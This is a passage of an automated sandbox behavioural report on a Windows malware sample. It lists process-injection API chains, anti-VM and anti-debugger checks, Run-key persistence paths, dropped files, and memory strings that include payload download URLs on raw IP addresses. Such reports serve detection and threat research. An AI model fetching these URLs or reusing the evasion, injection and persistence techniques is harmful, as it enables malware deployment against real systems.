ress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_0E8F4710
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Found evasive API chain (may stop execution after checking mutex)
          Source: C:\Users\user\Desktop\file.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_0-1344
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_5-1058
          Source: C:\Windows\System32\msiexec.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_8-1284
          Source: C:\Windows\System32\msiexec.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_8-1059
          Source: C:\Windows\System32\svchost.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_2-1056
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_5-1382
          Source: C:\Windows\System32\svchost.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_2-1360
          Source: C:\Windows\System32\audiodg.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_7-1057
          Source: C:\Users\user\Desktop\file.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_0-1113
          Source: C:\Windows\explorer.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_4-112920
          Source: C:\Windows\System32\audiodg.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_7-1352
          Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: file.exe, svchost.exe, 7D3ED97FB83B796922796.exe, audiodg.exe, msiexec.exeBinary or memory string: PROCESSHACKER.EXE
          Source: file.exe, svchost.exe, 7D3ED97FB83B796922796.exe, audiodg.exe, msiexec.exeBinary or memory string: PROCMON.EXE
          Source: msiexec.exe, 00000010.00000002.2032396064.00007FF7F2D05000.00000002.00000400.00020000.00000000.sdmpBinary or memory string: ZEROX64MADE IN ALGERIA <3REFLECTIVELOADERZBISOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN.EXESOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\RUNSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\STARTUPFOLDERWCSCPYLOADLIBRARYAKERNEL32.DLLGETPROCADDRESSKERNEL32.DLLMSVCRT.DLLWCSCATMSVCRT.DLLWCSCMPMSVCRT.DLLWCSNCPYMSVCRT.DLLWCSLENMSVCRT.DLLSTRLENMSVCRT.DLLREALLOCMSVCRT.DLLFREEMSVCRT.DLLWCSSTRMSVCRT.DLLCLOSEHANDLEKERNEL32.DLLGETVERSIONEXAKERNEL32.DLLCREATEDIRECTORYAKERNEL32.DLLGETFILEATTRIBUTESAKERNEL32.DLLGETMODULEFILENAMEAKERNEL32.DLLCOPYFILEAKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLCREATEFILEAKERNEL32.DLLHEAPALLOCKERNEL32.DLLGETPROCESSHEAPKERNEL32.DLLEXPANDENVIRONMENTSTRINGSWKERNEL32.DLLRESUMETHREADKERNEL32.DLLSETTHREADCONTEXTKERNEL32.DLLRTLCOMPAREMEMORYKERNEL32.DLLVIRTUALALLOCEXKERNEL32.DLLGETMODULEHANDLEAKERNEL32.DLLGETTHREADCONTEXTKERNEL32.DLLGETMODULEFILENAMEWKERNEL32.DLLVIRTUALPROTECTEXKERNEL32.DLLGETLASTERRORKERNEL32.DLLRELEASEMUTEXKERNEL32.DLLCREATEMUTEXAKERNEL32.DLLHEAPFREEKERNEL32.DLLWAITFORSINGLEOBJECTKERNEL32.DLLCREATETHREADKERNEL32.DLLCHECKREMOTEDEBUGGERPRESENTKERNEL32.DLLGETCURRENTPROCESSKERNEL32.DLLISDEBUGGERPRESENTKERNEL32.DLLEXITPROCESSKERNEL32.DLLDELETEFILEAKERNEL32.DLLPROCESS32NEXTWKERNEL32.DLLTERMINATEPROCESSKERNEL32.DLLOPENPROCESSKERNEL32.DLLPROCESS32FIRSTWKERNEL32.DLLCREATETOOLHELP32SNAPSHOTKERNEL32.DLLSETENDOFFILEKERNEL32.DLLLSTRCMPAKERNEL32.DLLWRITEPROCESSMEMORYKERNEL32.DLLREADPROCESSMEMORYKERNEL32.DLLGETFILESIZEKERNEL32.DLLWRITEFILEKERNEL32.DLLADJUSTTOKENPRIVILEGESADVAPI32.DLLOPENPROCESSTOKENADVAPI32.DLLLOOKUPPRIVILEGEVALUEWADVAPI32.DLLGETTOKENINFORMATIONADVAPI32.DLLCREATEFILEWKERNEL32.DLLSHGETFOLDERPATHWSHELL32.DLLSHGETFOLDERPATHASHELL32.DLLLSTRCATAKERNEL32.DLLSETFILEATTRIBUTESAKERNEL32.DLLSHGETKNOWNFOLDERPATHSHELL32.DLLFREELIBRARYKERNEL32.DLLMOVEFILEWKERNEL32.DLLGETFILESIZEEXKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLGETVOLUMEINFORMATIONAKERNEL32.DLLGETTICKCOUNTKERNEL32.DLLWSPRINTFWUSER32.DLLWSPRINTFAUSER32.DLLVIRTUALALLOCKERNEL32.DLLREADFILEKERNEL32.DLLSLEEPKERNEL32.DLLVIRTUALFREEKERNEL32.DLLSETFILEPOINTERKERNEL32.DLLCREATEDIRECTORYWKERNEL32.DLLFINDFIRSTFILEWKERNEL32.DLLFINDNEXTFILEWKERNEL32.DLLFINDCLOSEKERNEL32.DLLCOPYFILEWKERNEL32.DLLWRITEFILEKERNEL32.DLLGETSYSTEMDIRECTORYWKERNEL32.DLLEXITPROCESSKERNEL32.DLLCREATEREMOTETHREADKERNEL32.DLLINTERNETOPENURLWWININET.DLLINTERNETREADFILEWININET.DLLHTTPQUERYINFOAWININET.DLLINTERNETOPENWWININET.DLLINTERNETCONNECTWWININET.DLLHTTPOPENREQUESTWWININET.DLLHTTPSENDREQUESTAWININET.DLLINTERNETCLOSEHANDLEWININET.DLLPATHISURLWSHLWAPI.DLLPATHCOMBINEWSHLWAPI.DLLPATHFINDFILENAMEWSHLWAPI.DLLSTRSTRASHLWAPI.DLLURLDOWNLOADTOFILEWURLMON.DLLCREATEPROCESSWKERNEL32.DLLSHELLEXECUTEWSHELL32.DLLGETMODULEFILENAMEWKERNEL32.DLLGETSHORTPATHNAMEWKERNEL32.DLLGETENVIRONMENTVARIABLEWKERNEL32.DLLGETUSERNAMEAADVAPI32.DLLREGDELETEKEYWADVAPI32.DLLREGOPENKEYEXAADVAPI32.DLLREGSETVALUEEXAADVAPI32.DLLREGCLOSEKEYADVAPI32.DLLMESSAGEBOXAUSER32.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WIN64;
          Source: file.exe, svchost.exe, 7D3ED97FB83B796922796.exe, audiodg.exe, msiexec.exeBinary or memory string: X64DBG.EXE
          Source: file.exe, 00000000.00000002.1816809093.0000000000ED9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IEXEC.EXE.RELOC%SYSTEMROOT%\SYSTEM32\AUDIODG.EXENTUNMAPVIEWOFSECTIONCHFRWWDQWSLFEVUR.X64.X86RBNSPGESYBPROCESSHACKER.EXEHTTP://176.111.174.177/BIN/BOT64.BINHTTP://176.111.174.140/BIN/BOT64.BINPROCEXP.EXEPROCEXP64.EXETOTALCMD.EXEX64DBG.EXEIDAQ64.EXEIDAQ.EXEAUTORUNS.EXEPROCMON.EXESERVICESHTTP://176.111.174.177/BIN/BOT64.BINHTTP://176.111.174.140/BIN/BOT64.BINSVCHOST.EXEWORKER_VZNLPBPUTGMSIEXEC.EXEWORKER_ZLPJBMHSTEAUDIODG.EXEWORKER_PPCJTQMKMCWORKER_VZNLPBPUTG%08LX%04LX%LU\\.EXESERVICESSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCEDHIDDENUNKNOWNEXPLORER.EXESEDEBUGPRIVILEGE
          Source: file.exe, svchost.exe, 7D3ED97FB83B796922796.exe, audiodg.exe, msiexec.exeBinary or memory string: AUTORUNS.EXE
          Source: 7D3ED97FB83B796922796.exe.0.drBinary or memory string: KZEROX64MADE IN ALGERIA <3REFLECTIVELOADERZBISOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN.EXESOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\RUNSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\STARTUPFOLDERWCSCPYLOADLIBRARYAKERNEL32.DLLGETPROCADDRESSKERNEL32.DLLMSVCRT.DLLWCSCATMSVCRT.DLLWCSCMPMSVCRT.DLLWCSNCPYMSVCRT.DLLWCSLENMSVCRT.DLLSTRLENMSVCRT.DLLREALLOCMSVCRT.DLLFREEMSVCRT.DLLWCSSTRMSVCRT.DLLCLOSEHANDLEKERNEL32.DLLGETVERSIONEXAKERNEL32.DLLCREATEDIRECTORYAKERNEL32.DLLGETFILEATTRIBUTESAKERNEL32.DLLGETMODULEFILENAMEAKERNEL32.DLLCOPYFILEAKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLCREATEFILEAKERNEL32.DLLHEAPALLOCKERNEL32.DLLGETPROCESSHEAPKERNEL32.DLLEXPANDENVIRONMENTSTRINGSWKERNEL32.DLLRESUMETHREADKERNEL32.DLLSETTHREADCONTEXTKERNEL32.DLLRTLCOMPAREMEMORYKERNEL32.DLLVIRTUALALLOCEXKERNEL32.DLLGETMODULEHANDLEAKERNEL32.DLLGETTHREADCONTEXTKERNEL32.DLLGETMODULEFILENAMEWKERNEL32.DLLVIRTUALPROTECTEXKERNEL32.DLLGETLASTERRORKERNEL32.DLLRELEASEMUTEXKERNEL32.DLLCREATEMUTEXAKERNEL32.DLLHEAPFREEKERNEL32.DLLWAITFORSINGLEOBJECTKERNEL32.DLLCREATETHREADKERNEL32.DLLCHECKREMOTEDEBUGGERPRESENTKERNEL32.DLLGETCURRENTPROCESSKERNEL32.DLLISDEBUGGERPRESENTKERNEL32.DLLEXITPROCESSKERNEL32.DLLDELETEFILEAKERNEL32.DLLPROCESS32NEXTWKERNEL32.DLLTERMINATEPROCESSKERNEL32.DLLOPENPROCESSKERNEL32.DLLPROCESS32FIRSTWKERNEL32.DLLCREATETOOLHELP32SNAPSHOTKERNEL32.DLLSETENDOFFILEKERNEL32.DLLLSTRCMPAKERNEL32.DLLWRITEPROCESSMEMORYKERNEL32.DLLREADPROCESSMEMORYKERNEL32.DLLGETFILESIZEKERNEL32.DLLWRITEFILEKERNEL32.DLLADJUSTTOKENPRIVILEGESADVAPI32.DLLOPENPROCESSTOKENADVAPI32.DLLLOOKUPPRIVILEGEVALUEWADVAPI32.DLLGETTOKENINFORMATIONADVAPI32.DLLCREATEFILEWKERNEL32.DLLSHGETFOLDERPATHWSHELL32.DLLSHGETFOLDERPATHASHELL32.DLLLSTRCATAKERNEL32.DLLSETFILEATTRIBUTESAKERNEL32.DLLSHGETKNOWNFOLDERPATHSHELL32.DLLFREELIBRARYKERNEL32.DLLMOVEFILEWKERNEL32.DLLGETFILESIZEEXKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLGETVOLUMEINFORMATIONAKERNEL32.DLLGETTICKCOUNTKERNEL32.DLLWSPRINTFWUSER32.DLLWSPRINTFAUSER32.DLLVIRTUALALLOCKERNEL32.DLLREADFILEKERNEL32.DLLSLEEPKERNEL32.DLLVIRTUALFREEKERNEL32.DLLSETFILEPOINTERKERNEL32.DLLCREATEDIRECTORYWKERNEL32.DLLFINDFIRSTFILEWKERNEL32.DLLFINDNEXTFILEWKERNEL32.DLLFINDCLOSEKERNEL32.DLLCOPYFILEWKERNEL32.DLLWRITEFILEKERNEL32.DLLGETSYSTEMDIRECTORYWKERNEL32.DLLEXITPROCESSKERNEL32.DLLCREATEREMOTETHREADKERNEL32.DLLINTERNETOPENURLWWININET.DLLINTERNETREADFILEWININET.DLLHTTPQUERYINFOAWININET.DLLINTERNETOPENWWININET.DLLINTERNETCONNECTWWININET.DLLHTTPOPENREQUESTWWININET.DLLHTTPSENDREQUESTAWININET.DLLINTERNETCLOSEHANDLEWININET.DLLPATHISURLWSHLWAPI.DLLPATHCOMBINEWSHLWAPI.DLLPATHFINDFILENAMEWSHLWAPI.DLLSTRSTRASHLWAPI.DLLURLDOWNLOADTOFILEWURLMON.DLLCREATEPROCESSWKERNEL32.DLLSHELLEXECUTEWSHELL32.DLLGETMODULEFILENAMEWKERNEL32.DLLGETSHORTPATHNAMEWKERNEL32.DLLGETENVIRONMENTVARIABLEWKERNEL32.DLLGETUSERNAMEAADVAPI32.DLLREGDELETEKEYWADVAPI32.DLLREGOPENKEYEXAADVAPI32.DLLREGSETVALUEEXAADVAPI32.DLLREGCLOSEKEYADVAPI32.DLLMESSAGEBOXAUSER32.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WIN64
          Source: file.exe, svchost.exe, 7D3ED97FB83B796922796.exe, audiodg.exe, msiexec.exeBinary or memory string: IDAQ.EXE
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeMemory allocated: 1370000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeMemory allocated: 2E10000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeMemory allocated: 4E10000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8F7CF0 CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,Thread32Next,CloseHandle,4_2_0E8F7CF0
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 2947Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1174Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 685Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 670Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 6811Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 701Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 708Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeWindow / User API: threadDelayed 1143Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeWindow / User API: threadDelayed 1826Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-console-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-string-l1-1-0.dllJump to dropped file
